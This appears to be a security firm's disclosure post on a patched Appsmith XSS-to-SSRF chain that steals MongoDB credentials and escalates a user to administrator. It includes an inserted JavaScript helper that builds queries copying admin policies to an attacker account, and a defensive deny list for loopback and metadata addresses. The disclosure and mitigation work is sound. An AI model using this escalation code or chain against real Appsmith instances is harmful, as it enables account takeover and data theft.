Appsmith Vulnerabilities Can be Chained to Achieve 1-Click Admin Account Takeover

Published: September 1, 2022
Several vulnerabilities in Appsmith (which have now been patched) can be chained to achieve one-click full admin account takeover. Attackers can first exploit an XSS vulnerability to steal internal MongoDB credentials, then exploit an SSRF vulnerability to connect to the internal MongoDB.

Executive Summary

Threat
  • Several vulnerabilities in Appsmith (which have now been patched) can be chained to achieve one-click full admin account takeover.
  • Attackers can first exploit an XSS vulnerability to steal internal MongoDB credentials, then exploit an SSRF vulnerability to connect to the internal MongoDB.

Impact
  • The XSS vulnerability exposes sensitive auth tokens and credentials from the admin-only “/api/v1/admin/env” endpoint, using the admin’s own session.
  • Using the stolen credentials, the SSRF vulnerability can be exploited to execute insert/update/delete queries on the internal DB.

Mitigation
  • The root vulnerabilities in this chain (CVE-2022-38298 and CVE-2022-38299) have been fixed by Appsmith.
  • Update to versions 1.7.12 and above.
  • Maintain a whitelist of domains or addresses that your application is allowed to access.


Proof of Concept

Exfiltration of data through XSS

While navigating the different widgets available in Appsmith, we encountered a widget called Iframe. Using this widget, users can insert iframes with arbitrary URLs and srcDoc content into their Appsmith dashboards. We observed that the field named srcDoc is vulnerable to XSS.

XSS in srcDoc field

The XSS could have been used to steal the admin’s session cookies, but the session cookies were marked HttpOnly and hence are not accessible from JavaScript.

Session cookies

Even though we couldn’t gain access to the cookies, we were able to use an iframe to fetch sensitive content from an API endpoint that only administrators can access. One such endpoint is “/api/v1/admin/env”, which returns the environment variables of Appsmith, including infrastructure-related credentials. No user other than the administrator can access this endpoint.

Environment endpoint accessible only to the admin

Since we can inject an iframe and execute arbitrary JavaScript, the admin can be tricked into loading the iframe, which gives our JavaScript access to the iframe’s contents. As a proof of concept, the following code was injected into the srcDoc field: it inserts an iframe that loads the admin environment endpoint and reads the content of the iframe as soon as it finishes loading. The exfiltrated data is then sent, base64-encoded, to the attacker’s VPS, where it can be decoded.

Exploit Code for iframe injection and data exfiltration

Once the exploit is ready, it needs to be published so that other users can access it. This is done by making the Appsmith dashboard public, after which anyone with the link can open it.

Sharing the malicious dashboard

Once the dashboard is published and available to the public via a link, the link is sent to the administrator. As soon as the administrator clicks the link and views the dashboard, the iframe pointing at the sensitive endpoint is loaded, and the JavaScript reads the content of the iframe and sends it to the attacker. Here is how the data is received on the attacker’s end when the administrator visits the malicious dashboard.

Data exfiltration on the attacker’s end

Now, this base64-encoded data can be decoded by the attacker by running the following command:

$ echo "<base64_encoded_data>" | base64 --decode

Decoded credentials

The decoded MongoDB credentials can be used for further investigation and exploitation.

Access to Internal MongoDB via SSRF

From our previous testing on Appsmith, we knew that there are protections restricting access to the cloud instance’s internal metadata service, but no restrictions on localhost. In addition, Appsmith has a feature that allows users to connect MongoDB as a data source. We then checked whether this functionality could be used to connect to the internal MongoDB running on localhost, by filling the connection and authentication details obtained previously into the form for adding MongoDB as a data source.

Connecting to Internal MongoDB

On clicking “Save”, the data source was added successfully, after which we were able to view all the collections of the Appsmith database in the UI.

Collections in the internal MongoDB

Escalating privileges to Administrator

For each of these collections, it was possible to run the following DB queries:

  • INSERT
  • UPDATE
  • DELETE
  • FIND

Out of all the collections, the one named “Users” contains the details of all users on the platform. At this stage there are several ways to escalate privileges to administrator: it is even possible to modify the admin user’s password hash, or to add the admin policies to our own user. We proceeded by fetching the admin policies from MongoDB using the FIND command.

Fetching the policies for Admin User

We found that the administrator account has the following policies associated with it.

"policies": [
  {"groups": [], "permission": "manage:userWorkspace", "users": ["shadowadmin@cloudsek.com"]},
  {"groups": [], "permission": "read:userWorkspace", "users": ["shadowadmin@cloudsek.com"]},
  {"groups": [], "permission": "read:users", "users": ["shadowadmin@cloudsek.com"]},
  {"groups": [], "permission": "manage:users", "users": ["shadowadmin@cloudsek.com"]},
  {"groups": [], "permission": "manage:instanceEnv", "users": ["shadowadmin@cloudsek.com"]}
]

Then, using the UPDATE command, we replaced the policies assigned to our user with the admin policies. On clicking “RUN”, MongoDB returned a successful response.

Updating the policies of our user using the UPDATE command
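The FIND and UPDATE steps above, as an added worked example in mongosh-style filter/update documents (this is not CloudSEK’s query, which the post shows only as a screenshot). It assumes that the users collection keys accounts by an `email` field and that Appsmith grants a policy’s permission to the accounts listed in its `users` array, so the admin’s policies are copied with our own (placeholder) email substituted; a small in-memory stand-in for `updateOne` lets the effect be checked offline before anything is run against the real datasource.

```javascript
// Added illustration, not CloudSEK's query. Policy list: the one the post shows
// for the admin account. Attacker email: placeholder.
const ADMIN_EMAIL = "shadowadmin@cloudsek.com";
const OUR_EMAIL = "attacker@example.com"; // placeholder assumption

const ADMIN_POLICIES = [
  { groups: [], permission: "manage:userWorkspace", users: [ADMIN_EMAIL] },
  { groups: [], permission: "read:userWorkspace", users: [ADMIN_EMAIL] },
  { groups: [], permission: "read:users", users: [ADMIN_EMAIL] },
  { groups: [], permission: "manage:users", users: [ADMIN_EMAIL] },
  { groups: [], permission: "manage:instanceEnv", users: [ADMIN_EMAIL] },
];

// Constructed sample of the users collection: the admin and our low-privilege account.
const SAMPLE_USERS = [
  { email: ADMIN_EMAIL, policies: ADMIN_POLICIES },
  { email: OUR_EMAIL, policies: [] },
];

// Step 1 (FIND): filter + projection that pull only the admin's policies.
function adminPoliciesQuery(adminEmail) {
  return { filter: { email: adminEmail }, projection: { _id: 0, policies: 1 } };
}

// Step 2 (UPDATE): grant our account the same permissions. The users array is
// rewritten to our email on the assumption that a policy applies to the accounts
// it names; copying the admin's email verbatim would grant nothing to us.
function escalationUpdate(adminPolicies, ourEmail) {
  const policies = adminPolicies.map((p) => ({
    groups: p.groups,
    permission: p.permission,
    users: [ourEmail],
  }));
  return { filter: { email: ourEmail }, update: { $set: { policies } } };
}

// Minimal in-memory stand-in for collection.updateOne(filter, { $set }) so the
// effect can be checked offline. The real query runs through the datasource.
function applySetUpdate(docs, { filter, update }) {
  return docs.map((d) =>
    Object.keys(filter).every((k) => d[k] === filter[k]) ? { ...d, ...update.$set } : d
  );
}

// Validation helper: does this user document carry every admin permission for itself?
function hasAllAdminPermissions(userDoc, adminPolicies) {
  const granted = new Set(
    userDoc.policies
      .filter((p) => p.users.includes(userDoc.email))
      .map((p) => p.permission)
  );
  return adminPolicies.every((p) => granted.has(p.permission));
}

// End-to-end on the constructed sample: returns the collection after the update.
function runEscalation() {
  const found = SAMPLE_USERS.find((u) => u.email === adminPoliciesQuery(ADMIN_EMAIL).filter.email);
  return applySetUpdate(SAMPLE_USERS, escalationUpdate(found.policies, OUR_EMAIL));
}
```

The projection in step 1 keeps the FIND result to the five policy objects, which is all the UPDATE needs; the admin document itself is never modified, which is also what makes this route quieter than rewriting the admin’s password hash.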

Validation

To validate the vulnerability, we logged in to our user account via a different browser and found that it had access to all admin functionalities and permissions to manage users, workspaces, and instances.

Admin settings are accessible by our user

We then tried accessing the “/api/v1/admin/env” endpoint, which only administrators can access, and got a successful response from the server.

Able to access admin-only endpoint

Impact

Attackers can first exploit the XSS vulnerability to steal internal MongoDB credentials; the SSRF vulnerability can then be exploited to connect to the internal MongoDB, execute DB queries, and achieve full account takeover or privilege escalation. Also, Appsmith does not restrict signup in the default installation, so if an Appsmith instance is exposed to the internet, anyone can sign up and gain access to the data source functionality in which the SSRF vulnerability was discovered. This can have large-scale impact, given that over 1,000 Appsmith instances are exposed on the internet:

Shodan results for public Appsmith instances

Mitigation

  • The root vulnerabilities in this chain (CVE-2022-38298 and CVE-2022-38299) have been fixed by Appsmith.
  • Update to versions 1.7.12 and above.
  • Maintain a whitelist of domains or addresses that your application is allowed to access, and make sure any deny list covers loopback and link-local ranges, not only the cloud metadata address.
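An added example of the address check behind the last bullet (not Appsmith’s code): the SSRF in this post worked because the metadata address was blocked but loopback was not, so the check below rejects loopback, link-local (which contains the metadata address), RFC 1918 and the equivalent IPv6 ranges, and fails closed on anything that is not a canonical IP literal. It is meant to be applied to each address a datasource hostname resolves to, not to the hostname string; the caller does the DNS lookup first, otherwise a name that resolves to 127.0.0.1 (or rebinds to it) slips through.

```javascript
// Added example of a loopback/private/metadata deny list for user-supplied
// datasource hosts; not Appsmith's implementation. Apply to resolved addresses.

// Strict dotted-quad parser: returns the 32-bit value or null. Shorthand
// ("127.1"), decimal ("2130706433") and hex ("0x7f.1") forms return null on
// purpose so they cannot sneak past the range checks below.
function ipv4ToInt(ip) {
  const parts = ip.split(".");
  if (parts.length !== 4) return null;
  let n = 0;
  for (const p of parts) {
    if (!/^\d{1,3}$/.test(p) || Number(p) > 255) return null;
    n = n * 256 + Number(p);
  }
  return n;
}

// CIDR blocks a user-supplied datasource must never reach.
const BLOCKED_V4 = [
  ["0.0.0.0", 8],      // "this" network; 0.0.0.0 reaches loopback on Linux
  ["127.0.0.0", 8],    // loopback: the internal MongoDB in this post
  ["10.0.0.0", 8],     // RFC 1918
  ["172.16.0.0", 12],  // RFC 1918
  ["192.168.0.0", 16], // RFC 1918
  ["169.254.0.0", 16], // link-local, includes cloud metadata 169.254.169.254
];

function inCidr(ipInt, [base, bits]) {
  const mask = bits === 0 ? 0 : (~0 << (32 - bits)) >>> 0;
  return ((ipInt & mask) >>> 0) === ((ipv4ToInt(base) & mask) >>> 0);
}

// true  -> refuse this address
// false -> address is a public literal and may be used
function isBlockedAddress(addr) {
  let a = addr.trim().toLowerCase();
  if (a.startsWith("[") && a.endsWith("]")) a = a.slice(1, -1); // [::1] form

  // IPv4-mapped IPv6 carries an embedded v4 address in dotted or hex form.
  const mappedDotted = a.match(/^::ffff:(\d+\.\d+\.\d+\.\d+)$/);
  if (mappedDotted) a = mappedDotted[1];
  const mappedHex = a.match(/^::ffff:([0-9a-f]{1,4}):([0-9a-f]{1,4})$/);
  const v4 = mappedHex
    ? ((parseInt(mappedHex[1], 16) << 16) | parseInt(mappedHex[2], 16)) >>> 0
    : ipv4ToInt(a);
  if (v4 !== null) return BLOCKED_V4.some((c) => inCidr(v4, c));

  if (a.includes(":") && /^[0-9a-f:]+$/.test(a)) {
    if (a === "::" || a === "::1" || /^(0+:){7}0*1$/.test(a)) return true; // unspecified/loopback
    if (/^fe[89ab][0-9a-f]:/.test(a)) return true; // link-local fe80::/10
    if (/^f[cd][0-9a-f]{2}:/.test(a)) return true; // unique-local fc00::/7
    return false;
  }

  // Not a canonical literal (hostname, shorthand, decimal, hex): fail closed
  // and let the caller resolve it and re-check each resulting address.
  return true;
}
```

Applying the check to resolved addresses is the part that matters: a deny list that only inspects the string the user typed is exactly the kind of protection that covered the metadata IP here while leaving `localhost` open.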

Responsible Disclosure

CloudSEK submitted this vulnerability to Appsmith via their well-defined vulnerability disclosure process. Subsequently, the Appsmith team fixed this issue in their next release. Appsmith versions 1.7.12 and above do not have this vulnerability.


Contributors to this Article
Shashank Barthwal
Shashank is a Cyber Security Analyst at CloudSEK, who is also a security and automation enthusiast. He is especially passionate about coding and bug hunting.
Sparsh Kulshrestha
Sparsh is a Cyber Security Analyst at CloudSEK. This security professional hunts for points of vulnerability in client domains. He is OSCP certified and a bug bounty hunter who plays CTF for Team UnderDawg.
Deepanjli Paulraj
Deepanjli is CloudSEK's Lead Technical Content Writer and Editor. She is a pen wielding pedant with an insatiable appetite for books, Sudoku, and epistemology. She works on any and all content at CloudSEK, which includes blogs, reports, product documentation, and everything in between.
